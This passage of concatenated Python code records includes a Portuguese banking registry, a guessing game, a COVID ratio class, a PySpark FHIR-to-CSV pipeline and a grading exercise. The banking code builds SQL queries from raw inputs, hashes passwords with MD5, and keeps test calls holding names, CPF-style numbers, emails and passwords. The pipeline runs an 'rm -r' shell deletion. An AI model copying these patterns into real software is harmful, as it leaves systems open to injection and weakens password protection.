\\nPor favor, efetue o cadastro antes do login.\"\n\t\telse:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\n\t\tif( len(logado) == 0 ):\n\t\t\tlogado.append(None)\n \t\n\t\tlogado.append(mensagem)\n\n\t\treturn logado\n\n\n\t# Função que verifica se não há CPFs repetidos e cria um objeto pessoa:\n\tdef cadastrarCLIENTE(self,nome,sobrenome,cpf,email,tel):\n\t\tretorno = []\n\t\tif '' in [nome,sobrenome,cpf,email,tel]:\n\t\t\t# Algum dos valores não foi preenchido.\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tif self.buscaCLIENTE(cpf) != None:\n\t\t\t\t# Existe um produto já cadastrado com o mesmo código\n\t\t\t\tmensagem = \"O CPF informado já foi cadastrado!\"\n\t\t\telse:\n\t\t\t\tp = Pessoa(nome,sobrenome,cpf,email,tel)\n\t\t\t\ts = \"Não\"\n\t\t\t\tsql = (\"INSERT INTO cliente(cpf,nome,sobrenome,email,telefone,possui_conta) VALUES ('%s','%s','%s','%s','%s','%s')\" %(cpf,nome,sobrenome,email,tel,s))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tc = Cliente(p)\n\t\t\t\tself.clientes.append(c)\n\t\t\t\tmensagem = \"Cadastro do cliente realizado com sucesso!\"\n\t\t\t\tretorno.append(c)\n\t\t\n\t\tif len(retorno) == 0:\n\t\t\tretorno.append(None) # Houve um erro e o cliente não pôde ser cadastrado.\n\t\tretorno.append(mensagem)\t\n\t\treturn retorno\n\n\t# ---------------------------------------------------- #\n\n\t# Cadastra uma nova conta;\n\tdef cadastrarCONTA(self,numero,cpf,limite,senha,confirmSENHA):\n\t\t# print(\"cadastrarCONTA\")\n\t\tretorno = []\n\t\terros = 1\n\t\t#print('cadastrarCONTA(...)')\n\t\t#print(f\"Valores = {[numero, cpf, limite, senha, confirmSENHA]}\")\n\t\tif '' in [numero, cpf, limite, senha, confirmSENHA]:\n\t\t\t# Algum dos valores não foi preenchido.\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tc = self.buscaCLIENTE(cpf)\n\t\t\t#print(\"Chegou aqui *\")\n\t\t\tlimite2 = float(limite)\n\t\t\tif c.possuiCONTA == 'Sim':\n\t\t\t\t# O cliente selecionado já possui uma conta.\n\t\t\t\tmensagem = \"Este CPF já possui uma conta!\"\n\t\t\telse:\n\t\t\t\tif senha != confirmSENHA:\n\t\t\t\t\t# A senha e confirmSENHA não foram digitadas corretamente.\n\t\t\t\t\tmensagem = \"Senha e confirmação da senha digitadas INCORRETAMENTE!\"\n\t\t\t\telse:\n\t\t\t\t\tif limite2 < 20.00 or limite2 > 1000.00:\n\t\t\t\t\t\t# Limite não aceito. Não vamos aceitar um valor maior que 200 pois não confiamos. 
(Banco pequeno.)\n\t\t\t\t\t\tmensagem = \"Limite com valor não aceito.\"\n\t\t\t\t\telse:\n\t\t\t\t\t\t\n\t\t\t\t\t\t# Sem problemas, pode cadastrar normalmente.\n\t\t\t\t\t\t# print('Chegou aqui no cadastro de conta.')\n\t\t\t\t\t\tconta_nova = Conta(numero,c,0,limite2,senha)\n\t\t\t\t\t\t#print(\"Chegou aqui *\")\n\t\t\t\t\t\t#self.contas.append(conta_nova)\n\t\t\t\t\t\tsql = (\"INSERT INTO conta(numero,cpf_cliente,saldo,limite,senha) VALUES ('%s','%s','%f','%f',MD5('%s'))\" %(numero,c.cpf,conta_nova.saldo,limite2,senha))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tc.possuiCONTA = 'Sim'\n\t\t\t\t\t\tdata = datetime.date.today()\n\t\t\t\t\t\tinfo= (\"Criação da conta realizada.\")\n\t\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(numero,data,info))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tsql = (\"UPDATE cliente SET possui_conta = '%s' WHERE cpf = '%s'\" %(\"Sim\",c.cpf))\n\t\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\t\tmensagem = \"Cadastro realizado com sucesso!\"\n\t\t\t\t\t\terros = 0\n\t\tretorno.append(erros)\n\t\tretorno.append(mensagem)\n\t\t#print(retorno)\n\t\treturn retorno\n\n\n\t# -------------------------------------------------------------- #\t\n\t\"\"\"\n\tdef efetuarTRANSFERENCIA(self, conta1, cpf2, valor):\n\t\tif '' in [cpf2, valor]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor1 = float(valor)\n\t\t\tconta2 = self.buscaCONTA_cpf(cpf2)\n\t\t\tif conta2 == None:\n\t\t\t\tmensagem = \"A conta destino não foi encontrada!\"\n\t\t\telse:\n\t\t\t\tif conta1.transfere(conta2, valor1):\n\t\t\t\t\tmensagem = \"Transferencia realizada com sucesso!\"\n\t\t\t\telse:\n\t\t\t\t\tmensagem = \"Ocorreu um erro na transferencia\"\n\t\treturn mensagem\n\t\"\"\"\n\t\n\tdef EfetuarDEPOSITAR(self,cpf,depos):\n\t\tif '' in [cpf,depos]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(depos)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo+valor <= Encontrado.limite):\n\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo+valor,Encontrado.titular.cpf))\t\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Depósito realizado com sucesso!\"\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Depósito realizado de %.2f R$.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de depósito de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Depósito realizado sem sucesso!\"\n\t\treturn mensagem\n\t\n\tdef EfetuarSAQUE(self,cpf,saque):\n\t\tif '' in [cpf,saque]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(saque)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo >= valor ):\n\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente 
= '%s'\" %(saldo-valor,Encontrado.titular.cpf))\t\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo= (\"Saque realizado de %.2f R$.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Saque realizado com sucesso!\"\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de saque de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Saque realizado sem sucesso!\"\n\t\treturn mensagem\n\t\n\tdef EfetuarTRANSFERENCIA(self,cpf,destino,transf):\n\t\tif '' in [cpf,destino,transf]:\n\t\t\tmensagem = \"Todos os valores devem ser preenchidos!\"\n\t\telse:\n\t\t\tvalor = float(transf)\n\t\t\tEncontrado = self.buscaCONTA(cpf)\n\t\t\tEncontrado2 = self.buscaCONTA(destino)\n\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado.titular.cpf))\n\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\tsaldo = float(Aqui[0][0])\n\t\t\tif(saldo >= valor ):\n\t\t\t\tsql = (\"SELECT saldo FROM conta WHERE cpf_cliente = '%s'\" %(Encontrado2.titular.cpf))\n\t\t\t\tAqui = self.bd.executaSELECT(sql)\n\t\t\t\tsaldo2 = float(Aqui[0][0])\n\t\t\t\tif(saldo2+valor <= Encontrado2.limite):\n\t\t\t\t\tsql = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo2+valor,Encontrado2.titular.cpf))\n\t\t\t\t\tsql2 = (\"UPDATE conta SET saldo = '%f' WHERE cpf_cliente = '%s'\" %(saldo-valor,Encontrado.titular.cpf))\t\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tself.bd.executaALTERACOES(sql2)\t\t\n\t\t\t\t\tdata = datetime.date.today()\n\t\t\t\t\tinfo = (\"Transferência realizada de %.2f R$ para a conta de número (%s).\" %(valor,Encontrado2.numero))\n\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tinfo = (\"Transferência recebida de %.2f R$ da conta de número (%s).\" %(valor,Encontrado.numero))\n\t\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado2.numero,data,info))\n\t\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\t\tmensagem = \"Transferência realizada com sucesso!\"\n\t\t\telse:\n\t\t\t\tdata = datetime.date.today()\n\t\t\t\tinfo = (\"Tentativa de transferência de %.2f R$ recusada.\" %valor)\n\t\t\t\tsql = (\"INSERT INTO historico(conta_num,data,descricao) VALUES ('%s','%s','%s')\" %(Encontrado.numero,data,info))\n\t\t\t\tself.bd.executaALTERACOES(sql)\n\t\t\t\tmensagem = \"Transferência realizada sem sucesso!\"\n\t\treturn mensagem\n\n\n\tdef pegaHISTORICO(self, esse):\n\t\tif esse == None:\n\t\t\tmensagem = None\n\t\telse:\n\t\t\tsql = (\"SELECT * FROM historico WHERE conta_num = '%s'\" %(esse.numero))\n\t\t\tmensagem = self.bd.executaSELECT(sql)\n\t\treturn mensagem\n\n# self,nome,sobrenome,cpf,email,tel\n# numero,cpf,limite,senha,confirmSENHA\n\n\"\"\"\nR = 
Registros()\nR.cadastrarCLIENTE(\"Vinicius\",\"Dias\",\"33469298092\",\"viniciusdias@ufpi.edu.br\",\"999473-2624\")\nR.cadastrarCLIENTE(\"Matheus\",\"Victor\",\"61206747307\",\"matheusvictor@ufpi.edu.br\",\"999126-7703\")\nR.cadastrarCONTA(\"145-60\",\"33469298092\",50.00,\"AzulDCDM\",\"AzulDCDM\")\nR.cadastrarCONTA(\"754-00\",\"61206747307\",500.00,\"ToLove\",\"ToLove\")\nR.EfetuarDEPOSITAR(\"33469298092\",20.00)\nR.EfetuarDEPOSITAR(\"33469298092\",20.00)\nR.EfetuarTRASFERENCIA(\"33469298092\",\"61206747307\",40.00)\nR.EfetuarTRASFERENCIA(\"33469298092\",\"61206747307\",700.00)\n\"\"\"\n","sub_path":"servidor/registros.py","file_name":"registros.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237122965","text":"\"\"\"First I must import the random function so I can easily choose a\nrandom number\"\"\"\n\nimport random\nr_num = random.randint(1,100)\nt_count = 0\nguess = int(input('Choose a number: '))\n\n\"\"\"loop meant to regulate the response as long as user enters a number\neither too high, low, correct, or if the user runs out of tries\"\"\"\n\nwhile (guess != r_num) and (t_count != 7):\n if guess > r_num:\n print('\\nToo high.')\n t_count += 1\n guess = int(input('Please try again: '))\n elif guess == r_num:\n print('Correct! You guessed the right number.')\n else:\n print('\\nToo low.')\n t_count += 1\n guess = int(input('Please try again: '))\n if guess == r_num:\n print('Correct! You guessed the right number.')\n elif t_count == 7:\n print('You have used up all of your tries. The correct number is', r_num)\n \n\n","sub_path":"guessgame.py","file_name":"guessgame.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573184921","text":"import pandas as pd\nimport datetime as dt\n\nclass Ascertainment:\n fmt_date = lambda date: dt.datetime.strftime(date, '%m-%d-%Y')\n print(fmt_date)\n csv_loc = lambda date: f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports_us/{Ascertainment.fmt_date(date)}.csv'\n \n def __init__(self, today: dt.datetime, past: dt.datetime) -> None:\n self.today = today\n self.past = past\n print('downloading JHU reports')\n self.today_report = pd.read_csv(Ascertainment.csv_loc(today))\n self.past_report = pd.read_csv(Ascertainment.csv_loc(past))\n\n def ratio_state(self, state: str) -> float:\n conf_total = lambda df: df[df.Province_State == state][['Confirmed', 'Total_Test_Results', 'Deaths']].iloc[0]\n today_conf_total = conf_total(self.today_report)\n past_conf_total = conf_total(self.past_report)\n dConfirmed = (today_conf_total.Confirmed - past_conf_total.Confirmed)\n pos_rate = dConfirmed / (today_conf_total.Total_Test_Results - past_conf_total.Total_Test_Results)\n # death_div_cases = (today_conf_total.Deaths - past_conf_total.Deaths) / dConfirmed\n # From YYG\n day_i = (self.today - dt.timedelta(days=(self.today - self.past).days // 2) - pd.to_datetime('2020-02-01')).days\n prevratio = 1000 / (day_i + 50) * pos_rate**0.5 + 2\n return prevratio\n","sub_path":"covid/ascertainment.py","file_name":"ascertainment.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167924664","text":"import findspark\nfindspark.init()\nimport pyspark\nfrom pyspark.sql import SparkSession\nspark = 
SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\nimport pyspark.sql.functions as F\nimport os\nfrom pyspark.sql.types import StringType\n\n\n# setup\ninput_path = '/home/muody/data/fhir_parsed/*.json'\noutput_path = '/home/muody/data/fhir_parsed/csv/'\ndf = spark.read.json(input_path, multiLine=True)\nos.system('rm -r /home/muody/data/fhir_parsed/csv/')\nos.system('mkdir /home/muody/data/fhir_parsed/csv/')\n\n\ndef create_claim(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # 'member_id'\n sub = root.select('id',F.col('patient.reference').alias('member_id'))\n sub = sub.withColumn('member_id',F.substring('member_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'billablePeriod'\n sub = root.select('id','billablePeriod.*')\n sub = sub.select('id',F.col('start').alias('billable_start'),F.col('end').alias('billable_end'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'contained'\n sub = root.select(F.col('id').alias('benefit_id'),F.explode('contained'))\n sub = sub.select('benefit_id','col.*')\n sub = sub.select('benefit_id',F.col('beneficiary.reference').alias('beneficiary_id'),'id','intent','status','subject')\n sub = sub.withColumn('beneficiary',F.substring('beneficiary_id',10,1000))\n sub = sub.withColumn('id',F.col('benefit_id'))\n # 'careTeam'\n sub = root.select('id',F.explode('careTeam'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','provider.*','role.*','sequence')\n sub = sub.select('id',F.col('reference').alias('provider_npi'),F.explode('coding'),'sequence')\n sub = sub.select('id','provider_npi',F.col('col.display').alias('provider_role'),F.col('sequence').alias('provider_sequence'))\n sub = sub.withColumn('provider_npi',F.substring('provider_npi',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # 'payment'\n sub = root.select('id','payment.*')\n sub = sub.select('id','amount.*')\n sub = sub.select('id',F.col('value').alias('paid_amount'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # write to file\n cols = [x for x in output.columns if x != 'id']\n output = output.select(*cols)\n return output.distinct()\n\n\ndef create_claim_line(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n root = root.select('id','claim.*',F.explode('item'))\n root = root.select('id',F.col('reference').alias('claim_number'),'col.*')\n # main\n output = root.select('id','claim_number',F.col('sequence').alias('claim_line_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # category\n sub = root.select('id','category.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('category_code'),F.col('display').alias('category_name'),'system')\n sub = sub.select('id','category_code','category_name',F.col('system').alias('category_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # locationCodeableConcept\n sub = root.select('id','locationCodeableConcept.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('location_code'),F.col('display').alias('location_name'),'system')\n sub = 
sub.select('id','location_code','location_name',F.col('system').alias('location_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # net\n sub = root.select('id',F.col('sequence').alias('claim_line_number'),'net.*')\n sub = sub.select('id','claim_line_number',F.col('value').alias('net_value'))\n output = output.join(sub, on=['id','claim_line_number'],how='left').distinct()\n # servicedPeriod\n sub = root.select('id',F.col('sequence').alias('claim_line_number'),'servicedPeriod.*')\n sub = sub.select('id','claim_line_number',F.col('start').alias('first_dos'),F.col('end').alias('last_dos'))\n output = output.join(sub, on=['id','claim_line_number'], how='left').distinct()\n # productOrService\n sub = root.select('id','sequence','productOrService.*')\n sub = sub.select('id','sequence',F.explode('coding'))\n sub = sub.select('id','sequence','col.*')\n sub = sub.select('id','sequence','code',F.col('display').alias('name'),'system')\n sub = sub.select('id',F.col('sequence').alias('claim_line_number'), 'code', 'name', F.col('system').alias('code_system'))\n output = output.join(sub, on=['id','claim_line_number'], how='left').distinct()\n # adjudication\n sub = root.select('id',F.explode('adjudication'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','amount.*','category.*')\n sub = sub.select('id','value',F.explode('coding'))\n sub = sub.select('id','value','col.*')\n sub = sub.select('id',F.col('value').alias('transaction_amount'),F.col('display').alias('transaction_type'))\n cols = [x for x in output.columns if x != 'id'] \n return output.select(*cols).distinct()\n\n\ndef create_procedure(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n root = root.select('id','claim.*',F.explode('item'))\n root = root.select('id',F.col('reference').alias('claim_number'),'col.*')\n root = root.withColumn('claim_number',F.substring('claim_number',10,1000))\n # main\n output = root.select('id','claim_number')\n # productOrService\n sub = root.select('id','productOrService.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select('id','col.*')\n sub = sub.select('id',F.col('code').alias('procedure_code'),F.col('display').alias('procedure_name'),'system')\n sub = sub.select('id','procedure_code','procedure_name',F.col('system').alias('procedure_code_system'))\n output = output.join(sub, on=['id'], how='left').distinct()\n cols = [x for x in output.columns if x != 'id']\n return output.select(*cols).distinct()\n\n\ndef create_provider(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # careTeam\n sub = root.select('id',F.explode('careTeam'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','provider.*','role.*','sequence')\n sub = sub.select('id',F.col('reference').alias('provider_id'),F.explode('coding'),'sequence')\n sub = sub.select('id','provider_id',F.col('col.display').alias('provider_role'),F.col('sequence').alias('provider_sequence'))\n sub = sub.withColumn('provider_id',F.substring('provider_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # practitioner\n root = df.select(F.explode('resourcePractitioner'))\n root = root.select('col.*')\n sub = root.select('id','active','gender',F.explode('name'),'identifier')\n sub = 
sub.select(F.col('id').alias('provider_id'),'identifier','col.*')\n sub = sub.select('provider_id','family',F.col('given').getItem(0).alias('first_name'),'prefix')\n sub = sub.select('provider_id','family','first_name',F.col('prefix').getItem(0).alias('prefix'))\n sub = sub.select('provider_id',F.col('family').alias('last_name'),'first_name','prefix')\n output = output.join(sub, on=['provider_id'], how='left').distinct()\n # specialty\n sub = sub.select('provider_id').distinct()\n sub = sub.withColumn('group_name',F.lit('Gray Matter Health Center'))\n sub = sub.withColumn('provider_specialty_desc', \n\t\t\t F.when(F.rand() > 0.75, \"General Practice\")\\\n\t\t\t .when(F.rand() > 0.50, \"Family Medicine\")\\\n\t\t\t .when(F.rand() > 0.25, \"Preventive Medicine\")\\\n\t\t\t .otherwise(\"Internal Medicine\"))\n output = output.join(sub, on=['provider_id'], how='left').distinct()\n # rename provider npi\n output = output.withColumn('provider_npi',F.col('provider_id'))\n output = output.select(*[x for x in output.columns if x != 'provider_id'])\n cols = [x for x in output.columns if x != 'id']\n return output.select(*cols).distinct()\n\n\ndef create_diagnosis(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select('id',F.col('claim.reference').alias('claim_number'))\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n # diagnosis\n sub = root.select('id',F.explode('diagnosis'))\n sub = sub.select('id','col.*')\n sub = sub.select('id','diagnosisReference.*',F.explode('type'),'sequence')\n sub = sub.select('id','reference','col.*','sequence')\n sub = sub.select('id','reference',F.explode('coding'),'sequence')\n sub = sub.select('id',F.col('reference').alias('diagnosis_id'),'col.*','sequence')\n sub = sub.select('id','diagnosis_id',F.col('code').alias('type'),'sequence')\n sub = sub.withColumn('diagnosis_id',F.substring('diagnosis_id',10,1000))\n output = output.join(sub, on=['id'], how='left').distinct()\n # condition\n root = df.select(F.explode('resourceCondition'))\n root = root.select('col.*')\n sub = root.select('id','code.*')\n sub = sub.select('id',F.explode('coding'))\n sub = sub.select(F.col('id').alias('diagnosis_id'),'col.*')\n output = output.join(sub, on=['diagnosis_id'], how='left').distinct()\n output = output.filter(F.col('diagnosis_id').isNull()==False)\n output = output.select(\n\t'claim_number',\n\tF.col('code').alias('code'),\n\tF.col('display').alias('name'),\n\tF.col('system').alias('code_system'),\n )\n return output.distinct()\n\n\ndef create_medication(df):\n root = df.select(F.explode('resourceClaim'))\n root = root.select('col.*')\n output = root.select(F.col('id').alias('claim_number'))\n # prescription\n sub = root.select('id','prescription.*')\n sub = sub.select(F.col('id').alias('claim_number'),F.col('reference').alias('medication_id'))\n sub = sub.withColumn('medication_id',F.substring('medication_id',10,1000))\n output = output.join(sub, on=['claim_number'], how='left').distinct()\n # medicationCodeableConcept\n root = df.select(F.explode('resourceMedicationRequest'))\n root = root.select('col.*')\n sub = root.select('id','medicationCodeableConcept.*','authoredOn')\n sub = sub.select('id',F.explode('coding'),'authoredOn')\n sub = sub.select('id','col.*','authoredOn')\n sub = sub.select('id',F.col('code').alias('medication_code'),F.col('display').alias('medication_name'),'system','authoredOn')\n sub = 
sub.select('id','medication_code','medication_name',F.col('system').alias('medication_code_system'),'authoredOn')\n sub = sub.select(F.col('id').alias('medication_id'),'medication_code','medication_name','medication_code_system','authoredOn')\n sub = sub.select('medication_id','medication_code','medication_name','medication_code_system',F.col('authoredOn').alias('date_of_service'))\n output = output.join(sub, on=['medication_id'], how='left').distinct()\n output = output.withColumn('rx_claim_number',F.concat(F.col('claim_number'),F.col('medication_id')))\n output = output.filter(F.col('medication_id').isNull()==False)\n return output.distinct()\n\n\ndef create_member(df):\n # MEMBER\n root = df.select(F.explode('resourcePatient'))\n root = root.select('col.*')\n output = root.select('id',F.col('birthDate').alias('date_of_birth'),'gender')\n # name\n sub = root.select('id',F.explode('name').alias('name'))\n sub = sub.select('id','name.*')\n sub = sub.select('id','family',F.explode('given').alias('given'))\n sub = sub.select('id',F.col('family').alias('last_name'),F.col('given').alias('first_name'))\n output = output.join(sub, on=['id'], how='left').distinct()\n # address\n sub = root.select('id',F.explode('address').alias('address'))\n sub = sub.select('id','address.*')\n sub = sub.select('id',F.col('postalCode').alias('zip_code'),'state')\n output = output.join(sub, on=['id'], how='left').distinct()\n output = output.withColumn('member_id', F.col('id'))\n cols = [x for x in output.columns if x != 'id']\n output = output.select(*cols).distinct()\n return output.distinct()\n\n\ndef create_eligibility(df):\n root = df.select(F.explode('resourceExplanationOfBenefit'))\n root = root.select('col.*')\n output = root.select(F.col('id').alias('benefit_id'),F.col('claim.reference').alias('claim_number'),'patient.reference')\n output = output.withColumn('claim_number',F.substring('claim_number',10,1000))\n output = output.withColumn('member_id',F.substring('reference',10,1000))\n output = output.select('member_id','claim_number','benefit_id')\n # billablePeriod\n sub = root.select('id','billablePeriod.*')\n sub = sub.select('id','start','end')\n sub = sub.select(F.col('id').alias('benefit_id')\n , F.year('end').alias('y'),F.month('end').alias('m'))\n sub = sub.withColumn('plan_effective_date', F.when(F.col('m') >= 11\n , F.col('y')).otherwise(F.col('y')-1))\n sub = sub.withColumn('plan_expiration_date', F.when(F.col('m') >= 11\n , F.col('y')+1).otherwise(F.col('y')))\n sub = sub.withColumn('plan_effective_date', F.concat(F.lit(\"11/01/\")\n , F.col('plan_effective_date').cast(\"string\")))\n sub = sub.withColumn('plan_expiration_date', F.concat(F.lit(\"10/31/\")\n , F.col('plan_expiration_date').cast(\"string\")))\n sub = sub.withColumn('plan_effective_date'\n , F.from_unixtime(F.unix_timestamp('plan_effective_date', 'MM/dd/yyy')))\n sub = sub.withColumn('plan_expiration_date'\n , F.from_unixtime(F.unix_timestamp('plan_expiration_date', 'MM/dd/yyy')))\n output = output.join(sub, on=['benefit_id'], how='left').distinct()\n # insurance\n sub = root.select('id',F.explode('insurance'))\n sub = sub.select('id','col.*')\n sub = sub.select(F.col('id').alias('benefit_id'),F.col('coverage.display').alias('product_category'))\n output = output.join(sub, on=['benefit_id'], how='left').distinct()\n output = output.select(*[x for x in output.columns if x not in ['benefit_id','claim_number','y','m']])\n output = output.join(member,on=['member_id'],how='left').distinct()\n return output.distinct()\n\n\ndef 
create_lab(df):\n root = df.select(F.explode('resourceDiagnosticReport'))\n root = root.select('col.*')\n output = root.select(F.substring('subject.reference',10,1000).alias('member_id'))\n # prescription\n sub = root.select(F.substring('subject.reference',10,1000).alias('member_id'),'id','code.*')\n sub = sub.select('member_id',F.col('id').alias('lab_id'),F.explode('coding'))\n sub = sub.select('member_id','lab_id','col.*')\n output = output.join(sub, on=['member_id'], how='left').distinct()\n # lab date\n sub = root.select(F.col('id').alias('lab_id'),F.col('effectiveDateTime').alias('date'))\n output = output.join(sub, on=['lab_id'], how='left').distinct()\n return output.distinct()\n\nif __name__ == \"__main__\":\n claim = create_claim(df)\n claim_line = create_claim_line(df)\n procedure = create_procedure(df)\n diagnosis = create_diagnosis(df)\n medication = create_medication(df)\n member = create_member(df)\n eligibility = create_eligibility(df)\n lab = create_lab(df)\n provider = create_provider(df)\n\n\n claim.write.csv(output_path+'claim.csv', header=True)\n claim_line.write.csv(output_path+'claim_line.csv', header=True)\n provider.write.csv(output_path+'provider.csv', header=True)\n diagnosis.write.csv(output_path+'diagnosis.csv', header=True)\n medication.write.csv(output_path+'medication.csv', header=True)\n member.write.csv(output_path+'member.csv', header=True)\n eligibility.write.csv(output_path+'eligibility.csv', header=True)\n lab.write.csv(output_path+'lab.csv', header=True)\n","sub_path":"02_fhir_to_flat_sds.py","file_name":"02_fhir_to_flat_sds.py","file_ext":"py","file_size_in_byte":16111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"242092877","text":"\n# Média 3\n\nentrada = input().split()\n\nn1 = float(entrada[0])\nn2 = float(entrada[1])\nn3 = float(entrada[2])\nn4 = float(entrada[3])\n\n# Pesos: 2, 3, 4 e 1\nmedia = (n1*2) + (n2*3) + (n3*4) + (n4*1)\nmedia /= 10\n\nprint(\"Media: {m:1.1f}\".format(m=media))\n\nif media >= 7.0:\n print(\"Aluno aprovado.\")\nelif media < 5.0:\n print(\"Aluno reprovado.\")\nelif 5.0 <= media <= 6.9:\n print(\"Aluno em exame.\")\n\n exame = float(input())\n media = (media + exame)/2\n\n print(\"Nota do exame: {e:1.1f}\".format(e=exame))\n if exame >= 5.0:\n print(\"Aluno aprovado.\")\n else:\n print(\"Aluno reprovado.\")\n\n print(\"Media final: {m:1.1f}\".format(m=media))\n","sub_path":"uri/beginner/1040.py","file_name":"1040.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305993744","text":"#! 
